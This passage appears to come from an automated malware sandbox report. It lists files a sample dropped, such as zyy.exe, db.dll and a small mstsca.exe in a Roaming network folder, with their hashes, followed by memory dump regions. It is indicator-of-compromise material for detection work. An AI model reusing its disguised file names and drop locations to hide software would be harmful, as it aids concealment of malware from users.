                                    2f3ef8921f36beaedf364d72f01af70aaa16acd3804343a1c5ff4f72b91333b4489d15c33c08b05695b216cbd024fc8783676dd98a907be3af8cb8a56c075f4f

                                  • C:\Users\Admin\AppData\Local\Temp\zyy.exe

                                    Filesize

                                    328KB

                                    MD5

                                    bbaa394e6b0ecb7808722986b90d290c

                                    SHA1

                                    682e835d7ea19c9aa3d464436d673e5c89ab2bb6

                                    SHA256

                                    baa3acf778b3bcf4b7be932384799e8c95a5dc56c0faea8cbf7a33195ab47e73

                                    SHA512

                                    2f3ef8921f36beaedf364d72f01af70aaa16acd3804343a1c5ff4f72b91333b4489d15c33c08b05695b216cbd024fc8783676dd98a907be3af8cb8a56c075f4f

                                  • C:\Users\Admin\AppData\Local\Temp\zyy.exe

                                    Filesize

                                    328KB

                                    MD5

                                    bbaa394e6b0ecb7808722986b90d290c

                                    SHA1

                                    682e835d7ea19c9aa3d464436d673e5c89ab2bb6

                                    SHA256

                                    baa3acf778b3bcf4b7be932384799e8c95a5dc56c0faea8cbf7a33195ab47e73

                                    SHA512

                                    2f3ef8921f36beaedf364d72f01af70aaa16acd3804343a1c5ff4f72b91333b4489d15c33c08b05695b216cbd024fc8783676dd98a907be3af8cb8a56c075f4f

                                  • C:\Users\Admin\AppData\Local\Temp\zyy.exe

                                    Filesize

                                    328KB

                                    MD5

                                    bbaa394e6b0ecb7808722986b90d290c

                                    SHA1

                                    682e835d7ea19c9aa3d464436d673e5c89ab2bb6

                                    SHA256

                                    baa3acf778b3bcf4b7be932384799e8c95a5dc56c0faea8cbf7a33195ab47e73

                                    SHA512

                                    2f3ef8921f36beaedf364d72f01af70aaa16acd3804343a1c5ff4f72b91333b4489d15c33c08b05695b216cbd024fc8783676dd98a907be3af8cb8a56c075f4f

                                  • C:\Users\Admin\AppData\Local\bowsakkdestx.txt

                                    Filesize

                                    563B

                                    MD5

                                    3c66ee468dfa0688e6d22ca20d761140

                                    SHA1

                                    965c713cd69439ee5662125f0390a2324a7859bf

                                    SHA256

                                    4b230d2eaf9e5441f56db135faca2c761001787249d2358133e4f368061a1ea3

                                    SHA512

                                    4b29902d881bf20305322cc6a7bffb312187be86f4efa658a9d3c455e84f9f8b0d07f6f2bb6dac42ac050dc6f8d876e2b9df0ef4d5d1bb7e9be1223d652e04c6

                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

                                    Filesize

                                    9KB

                                    MD5

                                    9ead10c08e72ae41921191f8db39bc16

                                    SHA1

                                    abe3bce01cd34afc88e2c838173f8c2bd0090ae1

                                    SHA256

                                    8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

                                    SHA512

                                    aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

                                  • C:\Users\Admin\AppData\Roaming\dbdwbiw

                                    Filesize

                                    329KB

                                    MD5

                                    545746a5016236cfc019f89f921da346

                                    SHA1

                                    40a1f932374625dc1e703edf1930f5c888eda098

                                    SHA256

                                    253abf08a328cbf2b44f7a9f527b0e05371f4c4fd6b34a9956cee3f03210f444

                                    SHA512

                                    5559885fcc749f34377ccb093c5963f06b733353f20985a6dcb6f93c0ff1a727993b004c4e85e7b876b26f0b1eb4201d4e1bf69ed7c76e9f0c6bae3cf14ecb95

                                  • C:\Users\Admin\AppData\Roaming\gbdwbiw

                                    Filesize

                                    329KB

                                    MD5

                                    6e195bf95f1e6df5c96e31fa17d32c08

                                    SHA1

                                    2052fb8a54d776d48263bf7d7f0c397041108a1a

                                    SHA256

                                    595d22d790f57e4622d9583ae1544af1b2d445a95b760cb6e50f9d4d3b114e30

                                    SHA512

                                    cf1d92fa9ce81df1b69a597bbfc41ac9f522f6931f50a0c0648bb8d5dd53e75830dc3703c91820fd772f429c55336162c5eb248fddde9acb60b0136f1f368fe7

                                  • \Users\Admin\AppData\Local\Temp\Wtoahoepfise.dll

                                    Filesize

                                    3.2MB

                                    MD5

                                    4f2a3cefb67e87b1f2eaa266e498ae56

                                    SHA1

                                    d8c13c9db663969f961dba37cf1caafe3f5e8b6b

                                    SHA256

                                    74f44c6e8af4d6142286c4b80e7872b0fba0edad636a9796908e623472d04f08

                                    SHA512

                                    3fba357c19d1f35ba60ae66185ae87b7908f4c007b9228d635372ac20256565708c7025494ad9cc4675ee7697f2e0c8e862447cfad1b3fe6676de76080627e3a

                                  • \Users\Admin\AppData\Local\Temp\db.dll

                                    Filesize

                                    52KB

                                    MD5

                                    1b20e998d058e813dfc515867d31124f

                                    SHA1

                                    c9dc9c42a748af18ae1a8c882b90a2b9e3313e6f

                                    SHA256

                                    24a53033a2e89acf65f6a5e60d35cb223585817032635e81bf31264eb7dabd00

                                    SHA512

                                    79849fbdb9a9e7f7684b570d14662448b093b8aa2b23dfd95856db3a78faf75a95d95c51b8aa8506c4fbecffebcc57cd153dda38c830c05b8cd38629fae673c6

                                  • \Users\Admin\AppData\Local\Temp\db.dll

                                    Filesize

                                    52KB

                                    MD5

                                    1b20e998d058e813dfc515867d31124f

                                    SHA1

                                    c9dc9c42a748af18ae1a8c882b90a2b9e3313e6f

                                    SHA256

                                    24a53033a2e89acf65f6a5e60d35cb223585817032635e81bf31264eb7dabd00

                                    SHA512

                                    79849fbdb9a9e7f7684b570d14662448b093b8aa2b23dfd95856db3a78faf75a95d95c51b8aa8506c4fbecffebcc57cd153dda38c830c05b8cd38629fae673c6

                                  • memory/60-230-0x0000023D1D800000-0x0000023D1D872000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/60-250-0x0000023D1D800000-0x0000023D1D872000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/60-236-0x0000023D1D920000-0x0000023D1D992000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/60-278-0x0000023D1D920000-0x0000023D1D992000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/760-563-0x0000018EC7390000-0x0000018EC749B000-memory.dmp

                                    Filesize

                                    1.0MB

                                  • memory/760-467-0x0000018EC4C60000-0x0000018EC4CD2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/760-226-0x0000018EC4C60000-0x0000018EC4CD2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/760-508-0x0000018EC6690000-0x0000018EC66AB000-memory.dmp

                                    Filesize

                                    108KB

                                  • memory/760-507-0x0000018EC6670000-0x0000018EC6690000-memory.dmp

                                    Filesize

                                    128KB

                                  • memory/760-506-0x0000018EC7390000-0x0000018EC749B000-memory.dmp

                                    Filesize

                                    1.0MB

                                  • memory/760-505-0x0000018EC4CE0000-0x0000018EC4CFB000-memory.dmp

                                    Filesize

                                    108KB

                                  • memory/760-248-0x0000018EC4C60000-0x0000018EC4CD2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1008-120-0x0000000000400000-0x0000000002B02000-memory.dmp

                                    Filesize

                                    39.0MB

                                  • memory/1008-118-0x00000000001F0000-0x00000000001F9000-memory.dmp

                                    Filesize

                                    36KB

                                  • memory/1056-345-0x00000218E4D40000-0x00000218E4DB2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1056-341-0x00000218E4800000-0x00000218E4872000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1132-305-0x000001FC5BD00000-0x000001FC5BD72000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1132-286-0x000001FC5BD00000-0x000001FC5BD72000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1132-290-0x000001FC5BDF0000-0x000001FC5BE62000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1132-337-0x000001FC5BDF0000-0x000001FC5BE62000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1280-396-0x0000024684140000-0x00000246841B2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1280-398-0x0000024684230000-0x00000246842A2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1376-437-0x000001B3BCD60000-0x000001B3BCDD2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1376-401-0x000001B3BCC70000-0x000001B3BCCE2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1456-347-0x00000199CC440000-0x00000199CC4B2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1456-339-0x00000199CC530000-0x00000199CC5A2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1472-152-0x0000000000080000-0x0000000000206000-memory.dmp

                                    Filesize

                                    1.5MB

                                  • memory/1528-134-0x0000000004980000-0x0000000004A9B000-memory.dmp

                                    Filesize

                                    1.1MB

                                  • memory/1864-385-0x00000128C2A40000-0x00000128C2AB2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1864-389-0x00000128C2AC0000-0x00000128C2B32000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2216-257-0x000001048D850000-0x000001048D8C2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2216-293-0x000001048D850000-0x000001048D8C2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2216-291-0x000001048DDB0000-0x000001048DE22000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2216-255-0x000001048DDB0000-0x000001048DE22000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2232-268-0x00000265F2740000-0x00000265F27B2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2232-270-0x00000265F1D20000-0x00000265F1D92000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2232-296-0x00000265F2740000-0x00000265F27B2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2232-301-0x00000265F1D20000-0x00000265F1D92000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2248-466-0x0000012C20A50000-0x0000012C20B84000-memory.dmp

                                    Filesize

                                    1.2MB

                                  • memory/2248-202-0x0000012C20A50000-0x0000012C20B84000-memory.dmp

                                    Filesize

                                    1.2MB

                                  • memory/2292-146-0x0000000004990000-0x0000000004AAB000-memory.dmp

                                    Filesize

                                    1.1MB

                                  • memory/2396-218-0x0000023E89720000-0x0000023E89792000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2396-210-0x0000023E88DA0000-0x0000023E88DED000-memory.dmp

                                    Filesize

                                    308KB

                                  • memory/2396-219-0x0000023E88FD0000-0x0000023E8901D000-memory.dmp

                                    Filesize

                                    308KB

                                  • memory/2396-245-0x0000023E89720000-0x0000023E89792000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2396-216-0x0000023E89970000-0x0000023E899E2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2396-244-0x0000023E89970000-0x0000023E899E2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2504-442-0x000001E66C970000-0x000001E66C9E2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2504-438-0x000001E66C630000-0x000001E66C6A2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2564-448-0x00000230FC100000-0x00000230FC172000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2564-447-0x00000230FBED0000-0x00000230FBF42000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2576-201-0x0000017E92050000-0x0000017E92184000-memory.dmp

                                    Filesize

                                    1.2MB

                                  • memory/2576-200-0x0000017E91ED0000-0x0000017E92043000-memory.dmp

                                    Filesize

                                    1.4MB

                                  • memory/2576-465-0x0000017E92050000-0x0000017E92184000-memory.dmp

                                    Filesize

                                    1.2MB

                                  • memory/2644-540-0x0000000000400000-0x0000000000537000-memory.dmp

                                    Filesize

                                    1.2MB

                                  • memory/2644-343-0x0000000000400000-0x0000000000537000-memory.dmp

                                    Filesize

                                    1.2MB

                                  • memory/2808-473-0x0000000000400000-0x0000000000537000-memory.dmp

                                    Filesize

                                    1.2MB

                                  • memory/2808-141-0x0000000000400000-0x0000000000537000-memory.dmp

                                    Filesize

                                    1.2MB

                                  • memory/2808-136-0x0000000000400000-0x0000000000537000-memory.dmp

                                    Filesize

                                    1.2MB

                                  • memory/2808-133-0x0000000000400000-0x0000000000537000-memory.dmp

                                    Filesize

                                    1.2MB

                                  • memory/2808-131-0x0000000000400000-0x0000000000537000-memory.dmp

                                    Filesize

                                    1.2MB

                                  • memory/3196-119-0x0000000000DE0000-0x0000000000DF6000-memory.dmp

                                    Filesize

                                    88KB

                                  • memory/3880-597-0x0000000004D60000-0x000000000509F000-memory.dmp

                                    Filesize

                                    3.2MB

                                  • memory/3928-490-0x0000000000400000-0x0000000000537000-memory.dmp

                                    Filesize

                                    1.2MB

                                  • memory/3980-483-0x0000000000400000-0x0000000000537000-memory.dmp

                                    Filesize

                                    1.2MB

                                  • memory/4164-552-0x0000000000400000-0x0000000000537000-memory.dmp

                                    Filesize

                                    1.2MB

                                  • memory/4168-393-0x0000000004710000-0x000000000473E000-memory.dmp

                                    Filesize

                                    184KB

                                  • memory/4168-549-0x00000000046F0000-0x00000000046F2000-memory.dmp

                                    Filesize

                                    8KB

                                  • memory/4168-550-0x00000000046F0000-0x00000000046F3000-memory.dmp

                                    Filesize

                                    12KB

                                  • memory/4168-561-0x0000000004740000-0x000000000475C000-memory.dmp

                                    Filesize

                                    112KB

                                  • memory/4168-546-0x0000000004740000-0x000000000475C000-memory.dmp

                                    Filesize

                                    112KB

                                  • memory/4412-548-0x0000000004730000-0x000000000474C000-memory.dmp

                                    Filesize

                                    112KB

                                  • memory/4524-235-0x0000000004B90000-0x0000000004C92000-memory.dmp

                                    Filesize

                                    1.0MB

                                  • memory/4524-428-0x0000000004B10000-0x0000000004B6E000-memory.dmp

                                    Filesize

                                    376KB

                                  • memory/4524-241-0x0000000004B10000-0x0000000004B6E000-memory.dmp

                                    Filesize

                                    376KB

                                  • memory/4648-142-0x0000000000400000-0x0000000000537000-memory.dmp

                                    Filesize

                                    1.2MB

                                  • memory/4648-144-0x0000000000400000-0x0000000000537000-memory.dmp

                                    Filesize

                                    1.2MB

                                  • memory/4648-147-0x0000000000400000-0x0000000000537000-memory.dmp

                                    Filesize

                                    1.2MB

                                  • memory/4648-482-0x0000000000400000-0x0000000000537000-memory.dmp

                                    Filesize

                                    1.2MB

                                  • memory/4648-145-0x0000000000400000-0x0000000000537000-memory.dmp

                                    Filesize

                                    1.2MB

                                  • memory/4776-192-0x0000000002B70000-0x0000000002B79000-memory.dmp

                                    Filesize

                                    36KB

                                  • memory/5012-562-0x0000000004D60000-0x000000000509F000-memory.dmp

                                    Filesize

                                    3.2MB

                                  • memory/5088-436-0x0000000002B60000-0x0000000002B69000-memory.dmp

                                    Filesize

                                    36KB

                                  • memory/5100-231-0x0000000004910000-0x0000000004A13000-memory.dmp

                                    Filesize

                                    1.0MB

                                  • memory/5100-238-0x0000000004850000-0x00000000048AE000-memory.dmp

                                    Filesize

                                    376KB

                                  • memory/5100-427-0x0000000004850000-0x00000000048AE000-memory.dmp

                                    Filesize

                                    376KB

                                  We care about your privacy.

                                  This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.